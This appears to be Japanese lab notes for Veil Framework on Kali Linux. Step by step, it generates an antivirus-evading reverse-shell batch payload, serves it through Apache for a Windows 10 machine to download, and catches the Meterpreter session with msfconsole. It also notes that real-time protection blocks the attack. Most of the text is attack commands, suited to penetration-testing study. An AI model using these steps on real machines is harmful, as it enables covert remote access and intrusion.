Veil Framework
Meterpreter セッションの確立には
ターゲット端末で実行ファイルを実行させ
アンチウイルスの検知の回避が必要
Veil Framework は
アンチウイルス回避ペイロードを生成するツール
KaliLinux にインストールするには
apt install veil-evasion
veil
で起動すると
セットアップスクリプトが実行され
[?] Are you sure you wish to install Veil?
Continue with installation? ([y]es/[s]ilent/[N]o):
となり
インストールモードを選ぶので
s を入力し Enter
インストールが終わって
veil >
と表示されたら
exit
で一度終了しておく
再度
veil
で起動し
Veil を最新化するために
update
でVeil を最新化する
現在使えるツールは
Evasion
Ordnance
の2つ
アンチウイルスを回避するツールを使うなら
Evasion なので
use 1
ペイロードリストをみたいのなら
list
を実行するとみれる
今回はこの中から22のものを使うので
use 22
を実行
どのようなツールかは
Description の項目にかかれている
これはリバースシェルなので
KaliLinux のIPをセット
set lhost 192.168.1.134
次にペイロードの作成
generate
を実行
するとファイル名を指定できるので
evil3
としておく
Hit enter to continue...
となったら Enter
これで作成はできたので
exit
で一度終了
ここで作成できたファイルは
一度デスクトップへコピーしておく
cp /var/lib/veil/output/source/evil3.bat /root/Desktop/
cp /root/Desktop/evil3.bat /var/www/html/share/ service apache2 restart
でダウンロードできるようにしておく
次にリバースシェルの待受設定
msfconsole
で Metasploit を起動
これで Windows10 でブラウザから
evil3 をダウンロードし
実行すると
コマンドプロンプトが立ち上がり
セッションが確立される
ただしリアルタイム保護が有効化されていると
ダウンロードもできないし
実行時に検知されセッションは確立できない